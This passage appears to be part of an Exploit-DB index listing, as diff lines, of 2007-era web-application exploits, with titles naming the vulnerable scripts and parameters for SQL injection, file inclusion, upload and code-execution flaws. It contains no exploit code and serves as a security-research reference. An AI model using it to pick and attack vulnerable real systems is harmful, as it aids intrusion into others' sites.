+4041,exploits/php/webapps/4041.html,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion",2007-06-07,GoLd_M,webapps,php, +4054,exploits/php/webapps/4054.php,"e-Vision CMS 2.02 - SQL Injection / Remote Code Execution",2007-06-08,Silentz,webapps,php, +4055,exploits/php/webapps/4055.html,"PHP Real Estate Classifieds - Remote File Inclusion",2007-06-09,"not sec group",webapps,php, +4057,exploits/asp/webapps/4057.txt,"GeometriX Download Portal - 'down_indir.asp?id' SQL Injection",2007-06-09,CyberGhost,webapps,asp, +4059,exploits/php/webapps/4059.txt,"Link Request Contact Form 3.4 - Remote Code Execution",2007-06-11,CorryL,webapps,php, +4062,exploits/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - 'low.php?topic' SQL Injection",2007-06-12,Silentz,webapps,php, +4063,exploits/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion",2007-06-12,Sp[L]o1T,webapps,php, +4064,exploits/php/webapps/4064.txt,"XOOPS Module horoscope 2.0 - Remote File Inclusion",2007-06-12,BeyazKurt,webapps,php, +4068,exploits/php/webapps/4068.txt,"XOOPS Module XFsection - 'modify.php' Remote File Inclusion",2007-06-13,Sp[L]o1T,webapps,php, +4069,exploits/php/webapps/4069.txt,"XOOPS Module XT-Conteudo - 'spaw_root' Remote File Inclusion",2007-06-13,g00ns,webapps,php, +4070,exploits/php/webapps/4070.txt,"XOOPS Module cjay content 3 - Remote File Inclusion",2007-06-13,g00ns,webapps,php, +4071,exploits/php/webapps/4071.txt,"Sitellite CMS 4.2.12 - '559668.php' Remote File Inclusion",2007-06-14,o0xxdark0o,webapps,php, +4072,exploits/php/webapps/4072.txt,"PHP::HTML 0.6.4 - 'PHPhtml.php' Remote File Inclusion",2007-06-14,o0xxdark0o,webapps,php, +4074,exploits/php/webapps/4074.txt,"PHPMyInventory 2.8 - 'global.inc.php' Remote File Inclusion",2007-06-16,o0xxdark0o,webapps,php, +4075,exploits/php/webapps/4075.txt,"YourFreeScreamer 1.0 - 'serverPath' Remote File Inclusion",2007-06-17,Crackers_Child,webapps,php, +4076,exploits/php/webapps/4076.php,"MiniBB 2.0.5 - 'Language' Local File Inclusion",2007-06-17,Dj7xpl,webapps,php, +4078,exploits/php/webapps/4078.php,"Solar Empire 2.9.1.1 - Blind SQL Injection / Hash Retrieve",2007-06-18,BlackHawk,webapps,php, +4079,exploits/php/webapps/4079.txt,"MiniBill 1.2.5 - 'run_billing.php' Remote File Inclusion",2007-06-18,Abo0od,webapps,php, +4081,exploits/php/webapps/4081.php,"Jasmine CMS 1.0 - SQL Injection / Remote Code Execution",2007-06-19,Silentz,webapps,php, +4082,exploits/php/webapps/4082.pl,"LiveCMS 3.4 - 'categoria.php?cid' SQL Injection",2007-06-20,g00ns,webapps,php, +4083,exploits/asp/webapps/4083.txt,"W1L3D4 WEBmarket 0.1 - SQL Injection",2007-06-20,Crackers_Child,webapps,asp, +4084,exploits/php/webapps/4084.txt,"XOOPS Module wiwimod 0.4 - Remote File Inclusion",2007-06-20,GoLd_M,webapps,php, +4085,exploits/php/webapps/4085.txt,"Musoo 0.21 - Remote File Inclusion",2007-06-20,GoLd_M,webapps,php, +4086,exploits/php/webapps/4086.pl,"LAN Management System (LMS) 1.9.6 - Remote File Inclusion",2007-06-20,Kw3[R]Ln,webapps,php, +4089,exploits/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,webapps,php, +4090,exploits/php/webapps/4090.pl,"Powl 0.94 - 'htmledit.php' Remote File Inclusion",2007-06-22,Kw3[R]Ln,webapps,php, +4091,exploits/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,webapps,php, +4092,exploits/php/webapps/4092.txt,"NetClassifieds - SQL Injection / Cross-Site Scripting / Full Path",2007-06-22,"laurent gaffié",webapps,php, +4095,exploits/php/webapps/4095.txt,"Pharmacy System 2.0 - 'index.php?ID' SQL Injection",2007-06-24,t0pP8uZz,webapps,php, +4096,exploits/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution",2007-06-24,DarkFig,webapps,php, +4097,exploits/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,webapps,php, +4098,exploits/php/webapps/4098.php,"Simple Invoices 2007 05 25 - 'index.php?submit' SQL Injection",2007-06-24,Kacper,webapps,php, +4099,exploits/php/webapps/4099.txt,"e107 < 0.7.8 - 'photograph' Arbitrary File Upload",2007-06-24,g00ns,webapps,php, +4100,exploits/php/webapps/4100.txt,"phpTrafficA 1.4.2 - 'pageid' SQL Injection",2007-06-24,"laurent gaffié",webapps,php, +4102,exploits/php/webapps/4102.txt,"b1gbb 2.24.0 - 'footer.inc.php?tfooter' Remote File Inclusion",2007-06-25,Rf7awy,webapps,php, +4103,exploits/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,webapps,php, +4104,exploits/php/webapps/4104.txt,"6ALBlog - 'newsid' SQL Injection",2007-06-25,Crackers_Child,webapps,php, +4105,exploits/php/webapps/4105.txt,"SiteDepth CMS 3.44 - 'ShowImage.php?name' File Disclosure",2007-06-25,"H4 / XPK",webapps,php, +4106,exploits/php/webapps/4106.php,"DreamLog 0.5 - 'upload.php' Arbitrary File Upload",2007-06-25,Dj7xpl,webapps,php, +4107,exploits/php/webapps/4107.txt,"Pagetool 1.07 - 'news_id' SQL Injection",2007-06-25,Katatafish,webapps,php, +4108,exploits/php/webapps/4108.txt,"eDocStore - 'doc.php?doc_id' SQL Injection",2007-06-25,t0pP8uZz,webapps,php, +4111,exploits/php/webapps/4111.txt,"PHPSiteBackup 0.1 - 'pcltar.lib.php' Remote File Inclusion",2007-06-26,GoLd_M,webapps,php, +4112,exploits/php/webapps/4112.txt,"EVA-Web 1.1 < 2.2 - 'index.php3' Remote File Inclusion",2007-06-26,g00ns,webapps,php, +4113,exploits/php/webapps/4113.pl,"WordPress 2.2 - 'wp-app.php' Arbitrary File Upload",2007-06-26,"Alexander Concha",webapps,php, +4114,exploits/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,webapps,php, +4115,exploits/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,webapps,php, +4116,exploits/php/webapps/4116.txt,"QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion",2007-06-27,Katatafish,webapps,php, +4122,exploits/php/webapps/4122.txt,"b1gbb 2.24.0 - SQL Injection / Cross-Site Scripting",2007-06-28,GoLd_M,webapps,php, +4124,exploits/php/webapps/4124.txt,"GL-SH Deaf Forum 6.4.4 - Local File Inclusion",2007-06-28,Katatafish,webapps,php, +4125,exploits/php/webapps/4125.txt,"WebChat 0.78 - 'login.php?rid' SQL Injection",2007-06-28,r00t,webapps,php, +4127,exploits/php/webapps/4127.txt,"Buddy Zone 1.5 - 'view_sub_cat.php?cat_id' SQL Injection",2007-06-29,t0pP8uZz,webapps,php, +4128,exploits/php/webapps/4128.txt,"Buddy Zone 1.5 - Multiple SQL Injections",2007-06-30,t0pP8uZz,webapps,php, +4129,exploits/php/webapps/4129.txt,"Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion",2007-06-30,BlackNDoor,webapps,php, +4130,exploits/php/webapps/4130.txt,"TotalCalendar 2.402 - 'view_event.php' SQL Injection",2007-06-30,t0pP8uZz,webapps,php, +4131,exploits/php/webapps/4131.txt,"XCMS 1.1 - 'Galerie.php' Local File Inclusion",2007-06-30,BlackNDoor,webapps,php, +4132,exploits/php/webapps/4132.txt,"sPHPell 1.01 - Multiple Remote File Inclusions",2007-06-30,"Mehmet Ince",webapps,php, +4133,exploits/php/webapps/4133.txt,"ArcadeBuilder Game Portal Manager 1.7 - SQL Injection",2007-07-01,t0pP8uZz,webapps,php, +4134,exploits/php/webapps/4134.txt,"Easybe 1-2-3 Music Store - 'process.php' SQL Injection",2007-07-01,t0pP8uZz,webapps,php, +4135,exploits/php/webapps/4135.pl,"phpEventCalendar 0.2.3 - 'eventdisplay.php' SQL Injection",2007-07-01,Iron,webapps,php, +4136,exploits/php/webapps/4136.txt,"YouTube Clone Script - 'msg.php?id' SQL Injection",2007-07-02,t0pP8uZz,webapps,php, +4138,exploits/php/webapps/4138.txt,"AV Arcade 2.1b - 'index.php?id' SQL Injection",2007-07-02,Kw3[R]Ln,webapps,php, +4139,exploits/php/webapps/4139.txt,"PHPDirector 0.21 - 'videos.php?id' SQL Injection",2007-07-02,Kw3[R]Ln,webapps,php, +4140,exploits/php/webapps/4140.txt,"vbzoom 1.x - 'forum.php?MainID' SQL Injection",2007-07-02,"Cold Zero",webapps,php, +4141,exploits/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,webapps,php, +4142,exploits/php/webapps/4142.txt,"Girlserv ads 1.5 - 'details_news.php' SQL Injection",2007-07-03,"Cold Zero",webapps,php, +4144,exploits/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution (2)",2007-07-03,BlackHawk,webapps,php, +4145,exploits/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution (1)",2007-07-03,BlackHawk,webapps,php, +4147,exploits/php/webapps/4147.php,"PNPHPBB2 < 1.2i - 'viewforum.php' SQL Injection",2007-07-03,Coloss,webapps,php, +4150,exploits/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,webapps,php, +4151,exploits/php/webapps/4151.sh,"AsteriDex 3.0 - 'callboth.php' Remote Code Execution",2007-07-05,"Carl Livitt",webapps,php, +4153,exploits/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,webapps,php, +4154,exploits/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection",2007-07-06,t0pP8uZz,webapps,php, +4156,exploits/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",webapps,php, +4159,exploits/php/webapps/4159.txt,"GameSiteScript 3.1 - profile id SQL Injection",2007-07-07,Xenduer77,webapps,php, +4161,exploits/php/webapps/4161.txt,"FlashGameScript 1.7 - 'user' SQL Injection",2007-07-08,Xenduer77,webapps,php, +4163,exploits/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change",2007-07-08,Dj7xpl,webapps,php, +4164,exploits/php/webapps/4164.txt,"Aigaion 1.3.3 - 'topic topic_id' SQL Injection",2007-07-09,CypherXero,webapps,php, +4166,exploits/php/webapps/4166.txt,"vBulletin Mod RPG Inferno 2.4 - 'inferno.php' SQL Injection",2007-07-10,t0pP8uZz,webapps,php, +4167,exploits/php/webapps/4167.txt,"OpenLD 1.2.2 - 'index.php?id' SQL Injection",2007-07-10,CypherXero,webapps,php, +4169,exploits/php/webapps/4169.txt,"FlashBB 1.1.8 - 'sendmsg.php' Remote File Inclusion",2007-07-10,Kw3[R]Ln,webapps,php, +4171,exploits/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion",2007-07-10,"H4 / XPK",webapps,php, +4173,exploits/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,webapps,php, +4174,exploits/php/webapps/4174.txt,"PsNews 1.1 - 'show.php?newspath' Local File Inclusion",2007-07-12,irk4z,webapps,php, +4179,exploits/php/webapps/4179.php,"MKPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,webapps,php, +4180,exploits/php/webapps/4180.txt,"MKPortal NoBoard Module (Beta) - Remote File Inclusion",2007-07-14,g00ns,webapps,php, +4182,exploits/php/webapps/4182.txt,"CMScout 1.23 - 'index.php' SQL Injection",2007-07-14,g00ns,webapps,php, +4183,exploits/php/webapps/4183.txt,"eSyndiCat Directory Software - Multiple SQL Injections",2007-07-14,d3v1l,webapps,php, +4184,exploits/php/webapps/4184.txt,"Realtor 747 - 'index.php?categoryId' SQL Injection",2007-07-14,t0pP8uZz,webapps,php, +4185,exploits/php/webapps/4185.txt,"Prozilla Directory Script - 'Directory.php?cat_id' SQL Injection",2007-07-14,t0pP8uZz,webapps,php, +4186,exploits/php/webapps/4186.txt,"paFileDB 3.6 - 'search.php' SQL Injection",2007-07-14,pUm,webapps,php, +4187,exploits/php/webapps/4187.txt,"Traffic Stats - 'referralUrl.php?offset' SQL Injection",2007-07-16,t0pP8uZz,webapps,php, +4189,exploits/php/webapps/4189.txt,"Expert Advisior - 'index.php?id' SQL Injection",2007-07-17,t0pP8uZz,webapps,php, +4191,exploits/php/webapps/4191.txt,"Pictures Rating - 'index.php?msgid' SQL Injection",2007-07-18,t0pP8uZz,webapps,php, +4192,exploits/php/webapps/4192.html,"Vivvo CMS 3.4 - 'index.php' Blind SQL Injection",2007-07-18,ajann,webapps,php, +4193,exploits/php/webapps/4193.txt,"QuickEStore 8.2 - 'insertorder.cfm' SQL Injection",2007-07-18,meoconx,webapps,php, +4194,exploits/php/webapps/4194.txt,"Joomla! Component Expose RC35 - Arbitrary File Upload",2007-07-18,"Cold Zero",webapps,php, +4195,exploits/php/webapps/4195.txt,"BBS E-Market - 'postscript.php?p_mode' Remote File Inclusion",2007-07-18,mozi,webapps,php, +4197,exploits/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - 'link_main.php' Remote File Inclusion",2007-07-18,bd0rk,webapps,php, +4198,exploits/asp/webapps/4198.txt,"A-shop 0.70 - Remote File Deletion",2007-07-18,Timq,webapps,asp, +4199,exploits/php/webapps/4199.txt,"Md-Pro 1.0.8x - Topics topicid SQL Injection",2007-07-18,anonymous,webapps,php, +4201,exploits/php/webapps/4201.txt,"Joomla! Component Pony Gallery 1.5 - SQL Injection",2007-07-19,ajann,webapps,php, +4206,exploits/php/webapps/4206.txt,"Blog System 1.x - 'index.php?news_id' SQL Injection",2007-07-20,t0pP8uZz,webapps,php, +4209,exploits/php/webapps/4209.txt,"WSN Links Basic Edition - 'catid' SQL Injection",2007-07-21,t0pP8uZz,webapps,php, +4210,exploits/php/webapps/4210.txt,"RGameScript Pro - 'page.php?id' Remote File Inclusion",2007-07-21,Warpboy,webapps,php, +4211,exploits/php/webapps/4211.html,"JBlog 1.0 - Create / Delete Admin Authentication Bypass",2007-07-21,s4mi,webapps,php, +4212,exploits/php/webapps/4212.txt,"Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution",2007-07-22,"Johannes Greil",webapps,php, +4213,exploits/php/webapps/4213.txt,"bwired - 'index.php?newsID' SQL Injection",2007-07-22,g00ns,webapps,php, +4219,exploits/php/webapps/4219.txt,"Confixx Pro 3.3.1 - 'saveserver.php' Remote File Inclusion",2007-07-24,"H4 / XPK",webapps,php, +4220,exploits/php/webapps/4220.pl,"Entertainment CMS - Local File Inclusion / Remote Command Execution",2007-07-24,Kw3[R]Ln,webapps,php, +4221,exploits/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,webapps,php, +4224,exploits/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injections",2007-07-25,bypass,webapps,php, +4225,exploits/php/webapps/4225.txt,"IndexScript 2.8 - 'cat_id' SQL Injection",2007-07-25,xssvgamer,webapps,php, +40466,exploits/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,webapps,php, +4235,exploits/php/webapps/4235.txt,"Seditio CMS 121 - 'pfs.php' Arbitrary File Upload",2007-07-27,A.D.T,webapps,php, +4238,exploits/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,webapps,php, +4239,exploits/asp/webapps/4239.txt,"SimpleBlog 3.0 - 'comments_get.asp?id' SQL Injection",2007-07-28,g00ns,webapps,asp, +4241,exploits/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php?cat' SQL Injection",2007-07-28,t0pP8uZz,webapps,php, +4242,exploits/php/webapps/4242.php,"LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection",2007-07-29,EgiX,webapps,php, +4246,exploits/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,webapps,php, +4248,exploits/php/webapps/4248.txt,"Joomla! Component com_gmaps 1.00 - 'mapId' SQL Injection",2007-07-31,"Mehmet Ince",webapps,php, +4253,exploits/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - 'main.php?cid' SQL Injection",2007-08-02,uimp,webapps,php, +4254,exploits/php/webapps/4254.txt,"AuraCMS Forum Module - SQL Injection",2007-08-05,k1tk4t,webapps,php, +4256,exploits/php/webapps/4256.pl,"Envolution 1.1.0 - 'topic' SQL Injection",2007-08-05,k1tk4t,webapps,php, +4258,exploits/php/webapps/4258.txt,"Lanius CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,webapps,php, +4261,exploits/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure",2007-08-06,GoLd_M,webapps,cgi, +4264,exploits/cgi/webapps/4264.txt,"Cartweaver 2.16.11 - 'ProdID' SQL Injection",2007-08-06,meoconx,webapps,cgi, +4265,exploits/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php?cat' SQL Injection",2007-08-06,t0pP8uZz,webapps,php, +4267,exploits/php/webapps/4267.txt,"PhpHostBot 1.06 - 'svr_rootscript' Remote File Inclusion",2007-08-07,K-159,webapps,php, +4268,exploits/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Remote File Inclusion",2007-08-07,kezzap66345,webapps,php, +4269,exploits/php/webapps/4269.txt,"FrontAccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,webapps,php, +4271,exploits/php/webapps/4271.txt,"FishCart 3.2 RC2 - 'fc_example.php' Remote File Inclusion",2007-08-08,k1n9k0ng,webapps,php, +4273,exploits/php/webapps/4273.txt,"Ncaster 1.7.2 - 'archive.php' Remote File Inclusion",2007-08-09,k1n9k0ng,webapps,php, +4275,exploits/php/webapps/4275.php,"PHP Blue Dragon CMS 3.0.0 - SQL Injection",2007-08-10,Kacper,webapps,php, +4276,exploits/php/webapps/4276.txt,"PHP blue dragon CMS 3.0.0 - Remote File Inclusion",2007-08-10,Kacper,webapps,php, +4277,exploits/php/webapps/4277.php,"PHP Blue Dragon CMS 3.0.0 - Remote Code Execution",2007-08-10,Kacper,webapps,php, +4278,exploits/php/webapps/4278.txt,"Pixlie 1.7 - 'pixlie.php?root' Remote File Disclosure",2007-08-10,Rizgar,webapps,php, +4282,exploits/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - 'file' Remote File Disclosure",2007-08-13,dun,webapps,php, +4284,exploits/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php?cat' SQL Injection",2007-08-13,t0pP8uZz,webapps,php, +4286,exploits/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Authentication Bypass / SQL Injection",2007-08-14,s4squatch,webapps,cgi, +4291,exploits/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php?query' SQL Injection",2007-08-16,RoXur777,webapps,php, +4295,exploits/php/webapps/4295.txt,"Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,webapps,php, +4296,exploits/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,webapps,php, +4300,exploits/php/webapps/4300.txt,"litecommerce 2004 - 'category_id' SQL Injection",2007-08-21,k1tk4t,webapps,php, +4305,exploits/php/webapps/4305.txt,"Joomla! Component NeoRecruit 1.4 - 'id' SQL Injection",2007-08-23,ajann,webapps,php, +4306,exploits/php/webapps/4306.txt,"Mambo Component Remository - 'cat' SQL Injection",2007-08-23,ajann,webapps,php, +4307,exploits/php/webapps/4307.txt,"Joomla! Component RSfiles 1.0.2 - 'path' File Download",2007-08-23,ajann,webapps,php, +4308,exploits/php/webapps/4308.txt,"Joomla! Component Nice Talk 0.9.3 - 'tagid' SQL Injection",2007-08-23,ajann,webapps,php, +4309,exploits/php/webapps/4309.txt,"Joomla! Component EventList 0.8 - 'did' SQL Injection",2007-08-23,ajann,webapps,php, +4310,exploits/php/webapps/4310.txt,"Joomla! Component BibTeX 1.3 - Blind SQL Injection",2007-08-23,ajann,webapps,php, +4313,exploits/php/webapps/4313.pl,"SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,webapps,php, +4317,exploits/php/webapps/4317.txt,"2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion",2007-08-26,bd0rk,webapps,php, +4320,exploits/php/webapps/4320.txt,"SomeryC 0.2.4 - 'include.php?skindir' Remote File Inclusion",2007-08-27,Katatafish,webapps,php, +4326,exploits/php/webapps/4326.txt,"Arcadem 2.01 - SQL Injection / Remote File Inclusion",2007-08-27,SmOk3,webapps,php, +4327,exploits/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - 'show' SQL Injection",2007-08-27,D4m14n,webapps,php, +4329,exploits/php/webapps/4329.txt,"Micro CMS 3.5 - 'revert-content.php' SQL Injection",2007-08-28,"not sec group",webapps,php, +4330,exploits/php/webapps/4330.txt,"ACG News 1.0 - 'aid'/'catid' SQL Injection",2007-08-28,SmOk3,webapps,php, +4331,exploits/php/webapps/4331.pl,"DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection",2007-08-28,irvian,webapps,php, +4332,exploits/php/webapps/4332.txt,"VWar 1.5.0 R15 - 'mvcw.php' Remote File Inclusion",2007-08-28,DNX,webapps,php, +4333,exploits/php/webapps/4333.txt,"PHPNuke-Clan 4.2.0 - 'mvcw_conver.php' Remote File Inclusion",2007-08-28,DNX,webapps,php, +4336,exploits/php/webapps/4336.txt,"xGB 2.0 - 'xGB.php' Remote Security Bypass",2007-08-29,DarkFuneral,webapps,php, +4338,exploits/php/webapps/4338.pl,"ABC estore 3.0 - 'cat_id' Blind SQL Injection",2007-08-29,k1tk4t,webapps,php, +4339,exploits/php/webapps/4339.txt,"PHPNS 1.1 - 'shownews.php?id' SQL Injection",2007-08-29,SmOk3,webapps,php, +4340,exploits/php/webapps/4340.txt,"phpBG 0.9.1 - 'rootdir' Remote File Inclusion",2007-08-29,GoLd_M,webapps,php, +4341,exploits/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Arbitrary File Upload / Local File Inclusion",2007-08-29,GoLd_M,webapps,php, +4342,exploits/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",webapps,php, +4343,exploits/cgi/webapps/4343.txt,"Ourspace 2.0.9 - 'uploadmedia.cgi' Arbitrary File Upload",2007-08-30,Don,webapps,cgi, +4346,exploits/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,webapps,php, +4349,exploits/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection",2007-08-31,k1tk4t,webapps,php, +4350,exploits/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,webapps,php, +4352,exploits/php/webapps/4352.txt,"Weblogicnet - 'files_dir' Multiple Remote File Inclusions",2007-09-02,bius,webapps,php, +4353,exploits/php/webapps/4353.txt,"Yvora CMS 1.0 - 'error_view.php?ID' SQL Injection",2007-09-02,k1tk4t,webapps,php, +4356,exploits/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,webapps,php, +4358,exploits/php/webapps/4358.txt,"STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion",2007-09-03,leetsecurity,webapps,php, +4363,exploits/php/webapps/4363.txt,"PHPOF 20040226 - 'DB_adodb.class.php' Remote File Inclusion",2007-09-04,"ThE TiGeR",webapps,php, +4365,exploits/php/webapps/4365.txt,"AnyInventory 2.0 - 'Environment.php' Remote File Inclusion",2007-09-05,"ThE TiGeR",webapps,php, +4368,exploits/php/webapps/4368.txt,"PHPMytourney - 'menu.php' Remote File Inclusion",2007-09-06,S.W.A.T.,webapps,php, +4370,exploits/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE - 'start.php' SQL Injection",2007-09-07,k1tk4t,webapps,php, +4371,exploits/php/webapps/4371.txt,"RW::Download 2.0.3 lite - 'index.php?dlid' SQL Injection",2007-09-07,k1tk4t,webapps,php, +4374,exploits/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,webapps,php, +4376,exploits/php/webapps/4376.txt,"TLM CMS 3.2 - Multiple SQL Injections",2007-09-08,k1tk4t,webapps,php, +4377,exploits/php/webapps/4377.txt,"Focus/SIS 1.0/2.2 - Remote File Inclusion",2007-09-08,"ThE TiGeR",webapps,php, +4378,exploits/php/webapps/4378.html,"Fuzzylime CMS 3.0 - Local File Inclusion",2007-09-08,"not sec group",webapps,php, +4380,exploits/php/webapps/4380.txt,"Sisfo Kampus 2006 - 'blanko.preview.php' Local File Disclosure",2007-09-08,QTRinux,webapps,php, +4381,exploits/php/webapps/4381.txt,"Txx CMS 0.2 - Multiple Remote File Inclusions",2007-09-08,"Nice Name Crew",webapps,php, +4382,exploits/php/webapps/4382.txt,"PHPress 0.2.0 - 'adisplay.php?lang' Local File Inclusion",2007-09-08,"Nice Name Crew",webapps,php, +4383,exploits/php/webapps/4383.txt,"Joomla! Component Restaurante - Arbitrary File Upload",2007-09-08,"Cold Zero",webapps,php, +4384,exploits/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusions",2007-09-08,MhZ91,webapps,php, +4385,exploits/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,webapps,php, +4386,exploits/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php?f' Arbitrary File Download",2007-09-10,k-one,webapps,php, +4387,exploits/php/webapps/4387.txt,"phpRealty 0.02 - 'MGR' Multiple Remote File Inclusions",2007-09-10,QTRinux,webapps,php, +4390,exploits/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / Local File Inclusion",2007-09-10,k1tk4t,webapps,php, +4395,exploits/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",webapps,php, +4396,exploits/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusions",2007-09-11,aLiiF,webapps,php, +4397,exploits/php/webapps/4397.rb,"WordPress 1.5.1.1 < 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",webapps,php, +4400,exploits/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,webapps,php, +4401,exploits/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,webapps,php, +4404,exploits/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' SQL Injection",2007-09-13,"Sumit Siddharth",webapps,php, +4405,exploits/php/webapps/4405.txt,"Ajax File Browser 3b - 'settings.inc.php?approot' Remote File Inclusion",2007-09-14,"arfis project",webapps,php, +4406,exploits/php/webapps/4406.txt,"phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion",2007-09-14,Dj7xpl,webapps,php, +4407,exploits/php/webapps/4407.java,"PHP Webquest 2.5 - 'id_actividad' SQL Injection",2007-09-14,D4real_TeaM,webapps,php, +4408,exploits/php/webapps/4408.pl,"JBlog 1.0 - 'index.php?id' SQL Injection",2007-09-14,s4mi,webapps,php, +4410,exploits/php/webapps/4410.php,"Gelato - 'index.php?post' SQL Injection",2007-09-14,s0cratex,webapps,php, +4411,exploits/php/webapps/4411.txt,"Chupix CMS 0.2.3 - 'download.php' Remote File Disclosure",2007-09-15,GoLd_M,webapps,php, +4412,exploits/php/webapps/4412.pl,"KwsPHP 1.0 - 'login.php' SQL Injection",2007-09-15,s4mi,webapps,php, +4413,exploits/php/webapps/4413.pl,"KwsPHP 1.0 Member_Space Module - SQL Injection",2007-09-15,s4mi,webapps,php, +4414,exploits/php/webapps/4414.pl,"KwsPHP 1.0 stats Module - SQL Injection",2007-09-15,s4mi,webapps,php, +4415,exploits/php/webapps/4415.txt,"Joomla! Component flash fun! 1.0 - Remote File Inclusion",2007-09-15,Morgan,webapps,php, +4416,exploits/php/webapps/4416.txt,"Joomla! Component joom12pic 1.0 - Remote File Inclusion",2007-09-16,Morgan,webapps,php, +4417,exploits/php/webapps/4417.txt,"SimpCMS - 'keyword' SQL Injection",2007-09-16,"Cold Zero",webapps,php, +4418,exploits/php/webapps/4418.sh,"Omnistar Article Manager Software - 'article.php' SQL Injection",2007-09-16,"Cold Zero",webapps,php, +4419,exploits/php/webapps/4419.php,"Shop-Script FREE 2.0 - Remote Command Execution",2007-09-17,InATeam,webapps,php, +4421,exploits/php/webapps/4421.txt,"phpsyncml 0.1.2 - Remote File Inclusion",2007-09-18,S.W.A.T.,webapps,php, +4422,exploits/php/webapps/4422.txt,"KwsPHP 1.0 sondages Module - SQL Injection",2007-09-18,Houssamix,webapps,php, +4423,exploits/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,webapps,php, +4425,exploits/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,webapps,php, +4430,exploits/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File 